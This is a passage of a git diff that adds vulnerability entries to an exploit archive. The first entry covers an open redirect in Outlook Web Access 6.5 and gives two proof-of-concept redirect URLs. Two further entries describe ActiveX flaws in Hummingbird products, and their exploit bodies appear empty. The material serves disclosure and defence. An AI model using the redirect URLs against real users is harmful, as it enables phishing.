vulnerability because the application fails to properly sanitize user-supplied input. + +A successful exploit may aid in phishing attacks. + +OWA 6.5 SP 2 is vulnerable; other versions may also be affected. + +https://webmail.example.com/exchweb/bin/redir.asp?URL=http://www.example2.com + +https://webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 \ No newline at end of file diff --git a/platforms/windows/remote/32491.html b/platforms/windows/remote/32491.html new file mode 100755 index 000000000..e18936bcc --- /dev/null +++ b/platforms/windows/remote/32491.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/31783/info + +Hummingbird HostExplorer ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input. + +An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. + + \ No newline at end of file diff --git a/platforms/windows/remote/32493.html b/platforms/windows/remote/32493.html new file mode 100755 index 000000000..a6b813dc3 --- /dev/null +++ b/platforms/windows/remote/32493.html @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/31799/info + +Hummingbird Deployment Wizard 10 ActiveX control is prone to multiple vulnerabilities that attackers can exploit to run arbitrary code. The issues stem from insecure methods used within 'DeployRun.dll'. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues allows remote attackers to edit registry key information or execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. + +Hummingbird Deployment Wizard 10 10.0.0.44 is vulnerable; other versions may also be affected. + + \ No newline at end of file